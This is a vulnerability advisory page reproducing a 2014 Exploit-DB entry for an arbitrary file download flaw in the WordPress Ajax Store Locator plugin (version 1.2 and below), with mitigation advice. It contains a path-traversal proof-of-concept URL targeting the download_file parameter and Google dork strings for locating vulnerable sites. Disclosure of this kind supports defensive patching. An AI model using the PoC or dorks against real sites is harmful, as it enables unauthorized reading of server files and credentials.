Wordpress Ajax Store Locator

vendor:

Ajax Store Locator

by:

Claudio Viviani

7.5

CVSS

HIGH

Arbitrary File Download

CWE

Product Name: Ajax Store Locator

Affected Version From: 1

Affected Version To: 1.2

Patch Exists: NO

Related CWE: Not specified

CPE: a:wordpress_ajax_store_locator:ajax_store_locator_wordpress:1.0

Metasploit:

Other Scripts:

Platforms Tested: Windows 7, Linux

2014

WordPress Ajax Store Locator <= 1.2 Arbitrary File Download

The Wordpress Ajax Store Locator plugin version 1.2 and below is vulnerable to an arbitrary file download attack. The 'download_file' parameter in the 'sl_file_download.php' script is not properly sanitized, allowing an attacker to download arbitrary files from the server.

Mitigation:

Update to the latest version of the Wordpress Ajax Store Locator plugin to prevent this vulnerability. Additionally, ensure that user input is properly sanitized before being used in file download operations.

Source

Exploit-DB raw data:

######################

# Exploit Title : Wordpress Ajax Store Locator <= 1.2 Arbitrary File Download

# Exploit Author : Claudio Viviani

# Vendor Homepage : http://codecanyon.net/item/ajax-store-locator-wordpress/5293356

# Software Link : Premium

# Dork Google: inurl:ajax-store-locator
#              index of ajax-store-locator      

# Date : 2014-12-06

# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox

######################

# PoC Exploit:

http://TARGET/wp-content/plugins/ajax-store-locator-wordpress_0/sl_file_download.php?download_file=[../../somefile]

"download_file" variable is not sanitized.

 
#####################

Discovered By : Claudio Viviani
                http://www.homelab.it
		
                info@homelab.it
                homelabit@protonmail.ch

                https://www.facebook.com/homelabit
                https://twitter.com/homelabit
                https://plus.google.com/+HomelabIt1/
                https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww

#####################